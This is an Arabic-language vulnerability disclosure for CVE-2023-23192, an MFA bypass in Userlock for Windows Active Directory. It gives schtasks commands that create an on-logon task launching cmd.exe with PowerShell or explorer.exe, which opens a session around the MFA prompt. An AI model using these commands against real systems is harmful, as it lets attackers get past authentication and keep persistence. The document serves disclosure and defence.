
CVE-2023-23192
الوصف: يُعد Userlock حلاً للمصادقة متعددة العوامل (MFA) لبيئات Windows Active Directory والبيئات السحابية لمنع الوصول غير المصرح به وغير المرغوب فيه. وهو يتيح مصادقة مخصصة ثنائية العوامل (2FA) على تسجيل دخول Windows، وسطح المكتب البعيد (RDP وRD Gateway)، وIIS، والشبكات الافتراضية الخاصة (VPN)، والتطبيقات السحابية. يتيح لك Userlock تطبيق MFA على عمليات تسجيل دخول Active Directory على محطات العمل والخوادم المنضمة إلى المجال. تظهر نافذة حوار يمكنك من خلالها إدخال رمز OTP من تطبيق المصادقة (Authenticator App) عند أول تسجيل دخول يومي إلى محطة العمل. يتكامل Userlock مع عملية تسجيل الدخول لتوفير مصادقة ثنائية العوامل.
تُعد جدولة المهام واحدة من أكثر الاستراتيجيات استغلالًا التي يستخدمها المهاجمون لبناء استمرارية (persistence) على جهاز الضحية. وكثيرًا ما يستخدم الخصوم هذه الاستراتيجية لتجنب الاكتشاف الآلي، والحفاظ على الاستمرارية، وتنفيذ هجمات مفاجئة بعد فترات طويلة من التخفي.
الثغرة:
أنشئ مهمة مجدولة يتم تنفيذها بعد تسجيل دخول أي مستخدم.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c powershell.exe"

بعد تسجيل الدخول بنجاح باستخدام بيانات اعتماد المجال، يتم استدعاء cmd.exe المجدول مع مربع حوار Userlock MFA.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c explorer.exe"